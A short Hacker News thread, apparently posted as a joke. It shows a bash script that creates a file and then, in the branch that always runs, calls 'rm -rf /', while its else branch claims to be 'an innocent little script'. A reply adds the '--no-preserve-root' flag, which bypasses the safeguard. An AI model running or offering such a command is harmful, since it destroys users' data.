Hacker News new | ask | show | jobs
by whenov 3787 days ago

  #!/bin/bash

  touch x

  if [ -f "x" ]; then
      rm -rf /
  else
      echo "I'm just an innocent little script."
  fi
1 comments

rm -rf --no-preserve-root
Never put salt in your eyes. -- Kids In The Hall